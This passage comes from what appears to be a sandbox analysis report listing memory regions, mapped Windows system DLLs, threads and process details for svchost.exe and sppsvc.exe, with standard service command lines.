= 0xb9be78ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b9bd390000" filename = "" Region: id = 2482 start_va = 0xb9be790000 end_va = 0xb9be88ffff entry_point = 0x0 region_type = private name = "private_0x000000b9be790000" filename = "" Region: id = 2483 start_va = 0xb9be890000 end_va = 0xb9be98ffff entry_point = 0x0 region_type = private name = "private_0x000000b9be890000" filename = "" Region: id = 2484 start_va = 0xb9be990000 end_va = 0xb9bea0ffff entry_point = 0x0 region_type = private name = "private_0x000000b9be990000" filename = "" Region: id = 2485 start_va = 0xb9bea10000 end_va = 0xb9bea8ffff entry_point = 0x0 region_type = private name = "private_0x000000b9bea10000" filename = "" Region: id = 2486 start_va = 0xb9bea90000 end_va = 0xb9beb8ffff entry_point = 0x0 region_type = private name = "private_0x000000b9bea90000" filename = "" Region: id = 2487 start_va = 0x7df5ffdf0000 end_va = 0x7ff5ffdeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffdf0000" filename = "" Region: id = 2488 start_va = 0x7ff6e0460000 end_va = 0x7ff6e055ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0460000" filename = "" Region: id = 2489 start_va = 0x7ff6e0560000 end_va = 0x7ff6e0582fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0560000" filename = "" Region: id = 2490 start_va = 0x7ff6e0583000 end_va = 0x7ff6e0584fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0583000" filename = "" Region: id = 2491 start_va = 0x7ff6e0585000 end_va = 0x7ff6e0586fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0585000" filename = "" Region: id = 2492 start_va = 0x7ff6e0587000 end_va = 0x7ff6e0587fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0587000" filename = "" Region: id = 2493 start_va = 0x7ff6e0588000 end_va = 0x7ff6e0589fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0588000" filename = "" Region: id = 2494 start_va = 0x7ff6e058a000 end_va = 0x7ff6e058bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e058a000" filename = "" Region: id = 2495 start_va = 0x7ff6e058c000 end_va = 0x7ff6e058dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e058c000" filename = "" Region: id = 2496 start_va = 0x7ff6e058e000 end_va = 0x7ff6e058ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e058e000" filename = "" Region: id = 2497 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2498 start_va = 0x7ffc3eb10000 end_va = 0x7ffc3eb45fff entry_point = 0x7ffc3eb10000 region_type = mapped_file name = "accountaccessor.dll" filename = "\\Windows\\System32\\accountaccessor.dll" (normalized: "c:\\windows\\system32\\accountaccessor.dll") Region: id = 2499 start_va = 0x7ffc3eb50000 end_va = 0x7ffc3eb60fff entry_point = 0x7ffc3eb50000 region_type = mapped_file name = "userdatalanguageutil.dll" filename = "\\Windows\\System32\\UserDataLanguageUtil.dll" (normalized: "c:\\windows\\system32\\userdatalanguageutil.dll") Region: id = 2500 start_va = 0x7ffc3eb70000 end_va = 0x7ffc3eb90fff entry_point = 0x7ffc3eb70000 region_type = mapped_file name = "userdatatimeutil.dll" filename = "\\Windows\\System32\\UserDataTimeUtil.dll" (normalized: "c:\\windows\\system32\\userdatatimeutil.dll") Region: id = 2501 start_va = 0x7ffc3eba0000 end_va = 0x7ffc3ebdffff entry_point = 0x7ffc3eba0000 region_type = mapped_file name = "cemapi.dll" filename = "\\Windows\\System32\\cemapi.dll" (normalized: "c:\\windows\\system32\\cemapi.dll") Region: id = 2502 start_va = 0x7ffc3ebe0000 end_va = 0x7ffc3ec4bfff entry_point = 0x7ffc3ebe0000 region_type = mapped_file name = "synccontroller.dll" filename = "\\Windows\\System32\\SyncController.dll" (normalized: "c:\\windows\\system32\\synccontroller.dll") Region: id = 2503 start_va = 0x7ffc3f680000 end_va = 0x7ffc3f6c0fff entry_point = 0x7ffc3f680000 region_type = mapped_file name = "phoneutil.dll" filename = "\\Windows\\System32\\Phoneutil.dll" (normalized: "c:\\windows\\system32\\phoneutil.dll") Region: id = 2504 start_va = 0x7ffc3f6d0000 end_va = 0x7ffc3f840fff entry_point = 0x7ffc3f6d0000 region_type = mapped_file name = "pimstore.dll" filename = "\\Windows\\System32\\Pimstore.dll" (normalized: "c:\\windows\\system32\\pimstore.dll") Region: id = 2505 start_va = 0x7ffc3ff00000 end_va = 0x7ffc3ff46fff entry_point = 0x7ffc3ff00000 region_type = mapped_file name = "syncutil.dll" filename = "\\Windows\\System32\\syncutil.dll" (normalized: "c:\\windows\\system32\\syncutil.dll") Region: id = 2506 start_va = 0x7ffc40ff0000 end_va = 0x7ffc41005fff entry_point = 0x7ffc40ff0000 region_type = mapped_file name = "userdataplatformhelperutil.dll" filename = "\\Windows\\System32\\UserDataPlatformHelperUtil.dll" (normalized: "c:\\windows\\system32\\userdataplatformhelperutil.dll") Region: id = 2507 start_va = 0x7ffc41010000 end_va = 0x7ffc41026fff entry_point = 0x7ffc41010000 region_type = mapped_file name = "networkhelper.dll" filename = "\\Windows\\System32\\networkhelper.dll" (normalized: "c:\\windows\\system32\\networkhelper.dll") Region: id = 2508 start_va = 0x7ffc466b0000 end_va = 0x7ffc466fdfff entry_point = 0x7ffc466b0000 region_type = mapped_file name = "aphostservice.dll" filename = "\\Windows\\System32\\APHostService.dll" (normalized: "c:\\windows\\system32\\aphostservice.dll") Region: id = 2509 start_va = 0x7ffc46900000 end_va = 0x7ffc46947fff entry_point = 0x7ffc46900000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 2510 start_va = 0x7ffc46c90000 end_va = 0x7ffc46c9ffff entry_point = 0x7ffc46c90000 region_type = mapped_file name = "aphostclient.dll" filename = "\\Windows\\System32\\APHostClient.dll" (normalized: "c:\\windows\\system32\\aphostclient.dll") Region: id = 2511 start_va = 0x7ffc48ed0000 end_va = 0x7ffc48edbfff entry_point = 0x7ffc48ed0000 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 2512 start_va = 0x7ffc48ee0000 end_va = 0x7ffc48ef0fff entry_point = 0x7ffc48ee0000 region_type = mapped_file name = "userdatatypehelperutil.dll" filename = "\\Windows\\System32\\UserDataTypeHelperUtil.dll" (normalized: "c:\\windows\\system32\\userdatatypehelperutil.dll") Region: id = 2513 start_va = 0x7ffc4b0a0000 end_va = 0x7ffc4b0acfff entry_point = 0x7ffc4b0a0000 region_type = mapped_file name = "inproclogger.dll" filename = "\\Windows\\System32\\InprocLogger.dll" (normalized: "c:\\windows\\system32\\inproclogger.dll") Region: id = 2514 start_va = 0x7ffc4bc70000 end_va = 0x7ffc4bf51fff entry_point = 0x7ffc4bc70000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 2515 start_va = 0x7ffc4cad0000 end_va = 0x7ffc4cadafff entry_point = 0x7ffc4cad0000 region_type = mapped_file name = "mccspal.dll" filename = "\\Windows\\System32\\MCCSPal.dll" (normalized: "c:\\windows\\system32\\mccspal.dll") Region: id = 2516 start_va = 0x7ffc4d9d0000 end_va = 0x7ffc4daa5fff entry_point = 0x7ffc4d9d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2517 start_va = 0x7ffc4ddd0000 end_va = 0x7ffc4e145fff entry_point = 0x7ffc4ddd0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2518 start_va = 0x7ffc50c00000 end_va = 0x7ffc50d30fff entry_point = 0x7ffc50c00000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2519 start_va = 0x7ffc51cb0000 end_va = 0x7ffc51cc7fff entry_point = 0x7ffc51cb0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2520 start_va = 0x7ffc53920000 end_va = 0x7ffc53951fff entry_point = 0x7ffc53920000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2521 start_va = 0x7ffc53d70000 end_va = 0x7ffc53dcefff entry_point = 0x7ffc53d70000 region_type = mapped_file name = "msv1_0.dll" filename = "\\Windows\\System32\\msv1_0.dll" (normalized: "c:\\windows\\system32\\msv1_0.dll") Region: id = 2522 start_va = 0x7ffc54200000 end_va = 0x7ffc5420afff entry_point = 0x7ffc54200000 region_type = mapped_file name = "ntlmshared.dll" filename = "\\Windows\\System32\\NtlmShared.dll" (normalized: "c:\\windows\\system32\\ntlmshared.dll") Region: id = 2523 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2524 start_va = 0x7ffc54260000 end_va = 0x7ffc54273fff entry_point = 0x7ffc54260000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 2525 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2526 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2527 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2528 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2529 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2530 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2531 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2532 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2533 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2534 start_va = 0x7ffc55280000 end_va = 0x7ffc552b5fff entry_point = 0x7ffc55280000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2535 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2536 start_va = 0x7ffc55380000 end_va = 0x7ffc554dbfff entry_point = 0x7ffc55380000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2537 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2538 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2539 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2540 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2541 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2542 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2543 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2544 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2545 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2546 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2963 start_va = 0xb9beb90000 end_va = 0xb9bec8ffff entry_point = 0x0 region_type = private name = "private_0x000000b9beb90000" filename = "" Region: id = 2964 start_va = 0xb9bec90000 end_va = 0xb9bed8ffff entry_point = 0x0 region_type = private name = "private_0x000000b9bec90000" filename = "" Region: id = 2965 start_va = 0x7ff6e045c000 end_va = 0x7ff6e045dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e045c000" filename = "" Region: id = 2966 start_va = 0x7ff6e045e000 end_va = 0x7ff6e045ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e045e000" filename = "" Region: id = 2967 start_va = 0x7ffc486a0000 end_va = 0x7ffc48765fff entry_point = 0x7ffc486a0000 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 2968 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2969 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2970 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2971 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2972 start_va = 0xb9be790000 end_va = 0xb9be88ffff entry_point = 0x0 region_type = private name = "private_0x000000b9be790000" filename = "" Region: id = 2973 start_va = 0xb9bed90000 end_va = 0xb9bf0c6fff entry_point = 0xb9bed90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2974 start_va = 0x7ff6e058a000 end_va = 0x7ff6e058bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e058a000" filename = "" Region: id = 2975 start_va = 0x7ffc48ff0000 end_va = 0x7ffc49459fff entry_point = 0x7ffc48ff0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2976 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2977 start_va = 0x7ffc4cf00000 end_va = 0x7ffc4cf26fff entry_point = 0x7ffc4cf00000 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 2978 start_va = 0x7ffc50bd0000 end_va = 0x7ffc50bebfff entry_point = 0x7ffc50bd0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Thread: id = 421 os_tid = 0xfc0 Thread: id = 422 os_tid = 0xfbc Thread: id = 423 os_tid = 0xea8 Thread: id = 424 os_tid = 0xea4 Thread: id = 425 os_tid = 0xe9c Thread: id = 435 os_tid = 0x900 Thread: id = 437 os_tid = 0x4f0 Thread: id = 441 os_tid = 0xc20 Thread: id = 443 os_tid = 0xc18 Process: id = "19" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7496d000" os_pid = "0xf2c" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\System32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-3028837079-3186095147-955107200-3701964851-1150726376" [0xe], "NT AUTHORITY\\Logon Session 00000000:00076097" [0xc000000f], "LOCAL" [0x7] Thread: id = 426 os_tid = 0xf88 Thread: id = 427 os_tid = 0xf84 Thread: id = 428 os_tid = 0xf80 Thread: id = 429 os_tid = 0xf5c Thread: id = 430 os_tid = 0xf30 Process: id = "20" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0xe73000" os_pid = "0xf8c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\sppsvc.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:000783ee" [0xc000000f], "LOCAL" [0x7] Region: id = 2170 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2171 start_va = 0x2b56bb0000 end_va = 0x2b56bb6fff entry_point = 0x0 region_type = private name = "private_0x0000002b56bb0000" filename = "" Region: id = 2172 start_va = 0x2b56bc0000 end_va = 0x2b56bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002b56bc0000" filename = "" Region: id = 2173 start_va = 0x2b56bd0000 end_va = 0x2b56be3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002b56bd0000" filename = "" Region: id = 2174 start_va = 0x2b56bf0000 end_va = 0x2b56c6ffff entry_point = 0x0 region_type = private name = "private_0x0000002b56bf0000" filename = "" Region: id = 2175 start_va = 0x2b56c70000 end_va = 0x2b56d2dfff entry_point = 0x2b56c70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2176 start_va = 0x2b56d30000 end_va = 0x2b56daffff entry_point = 0x0 region_type = private name = "private_0x0000002b56d30000" filename = "" Region: id = 2177 start_va = 0x2b56db0000 end_va = 0x2b56eaffff entry_point = 0x0 region_type = private name = "private_0x0000002b56db0000" filename = "" Region: id = 2178 start_va = 0x2b56eb0000 end_va = 0x2b56eb6fff entry_point = 0x0 region_type = private name = "private_0x0000002b56eb0000" filename = "" Region: id = 2179 start_va = 0x2b56ec0000 end_va = 0x2b56ec5fff entry_point = 0x2b56ec0000 region_type = mapped_file name = "sppsvc.exe.mui" filename = "\\Windows\\System32\\en-US\\sppsvc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sppsvc.exe.mui") Region: id = 2180 start_va = 0x2b56ed0000 end_va = 0x2b56ed0fff entry_point = 0x0 region_type = private name = "private_0x0000002b56ed0000" filename = "" Region: id = 2181 start_va = 0x2b56ee0000 end_va = 0x2b56ee0fff entry_point = 0x0 region_type = private name = "private_0x0000002b56ee0000" filename = "" Region: id = 2182 start_va = 0x2b56ef0000 end_va = 0x2b56efffff entry_point = 0x0 region_type = private name = "private_0x0000002b56ef0000" filename = "" Region: id = 2183 start_va = 0x2b56f00000 end_va = 0x2b56f0ffff entry_point = 0x0 region_type = private name = "private_0x0000002b56f00000" filename = "" Region: id = 2184 start_va = 0x2b56f10000 end_va = 0x2b57097fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002b56f10000" filename = "" Region: id = 2185 start_va = 0x2b570a0000 end_va = 0x2b57220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002b570a0000" filename = "" Region: id = 2186 start_va = 0x2b57230000 end_va = 0x2b572effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002b57230000" filename = "" Region: id = 2187 start_va = 0x2b572f0000 end_va = 0x2b572fffff entry_point = 0x0 region_type = private name = "private_0x0000002b572f0000" filename = "" Region: id = 2188 start_va = 0x2b57300000 end_va = 0x2b5737ffff entry_point = 0x0 region_type = private name = "private_0x0000002b57300000" filename = "" Region: id = 2189 start_va = 0x2b57380000 end_va = 0x2b5747ffff entry_point = 0x0 region_type = private name = "private_0x0000002b57380000" filename = "" Region: id = 2190 start_va = 0x2b57480000 end_va = 0x2b574fffff entry_point = 0x0 region_type = private name = "private_0x0000002b57480000" filename = "" Region: id = 2191 start_va = 0x2b57500000 end_va = 0x2b57836fff entry_point = 0x2b57500000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2192 start_va = 0x7df5ff230000 end_va = 0x7ff5ff22ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff230000" filename = "" Region: id = 2193 start_va = 0x7ff6177b0000 end_va = 0x7ff6178affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6177b0000" filename = "" Region: id = 2194 start_va = 0x7ff6178b0000 end_va = 0x7ff6178d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6178b0000" filename = "" Region: id = 2195 start_va = 0x7ff6178d7000 end_va = 0x7ff6178d7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6178d7000" filename = "" Region: id = 2196 start_va = 0x7ff6178d8000 end_va = 0x7ff6178d9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6178d8000" filename = "" Region: id = 2197 start_va = 0x7ff6178da000 end_va = 0x7ff6178dbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6178da000" filename = "" Region: id = 2198 start_va = 0x7ff6178dc000 end_va = 0x7ff6178ddfff entry_point = 0x0 region_type = private name = "private_0x00007ff6178dc000" filename = "" Region: id = 2199 start_va = 0x7ff6178de000 end_va = 0x7ff6178dffff entry_point = 0x0 region_type = private name = "private_0x00007ff6178de000" filename = "" Region: id = 2200 start_va = 0x7ff617f40000 end_va = 0x7ff61856dfff entry_point = 0x7ff617f40000 region_type = mapped_file name = "sppsvc.exe" filename = "\\Windows\\System32\\sppsvc.exe" (normalized: "c:\\windows\\system32\\sppsvc.exe") Region: id = 2201 start_va = 0x7ffc3f410000 end_va = 0x7ffc3f425fff entry_point = 0x7ffc3f410000 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 2202 start_va = 0x7ffc3f430000 end_va = 0x7ffc3f451fff entry_point = 0x7ffc3f430000 region_type = mapped_file name = "cryptxml.dll" filename = "\\Windows\\System32\\cryptxml.dll" (normalized: "c:\\windows\\system32\\cryptxml.dll") Region: id = 2203 start_va = 0x7ffc3fa10000 end_va = 0x7ffc3fb8afff entry_point = 0x7ffc3fa10000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 2204 start_va = 0x7ffc4fb00000 end_va = 0x7ffc4fb35fff entry_point = 0x7ffc4fb00000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2205 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2206 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2207 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2208 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2209 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2210 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2211 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2212 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2213 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2214 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2215 start_va = 0x7ffc554e0000 end_va = 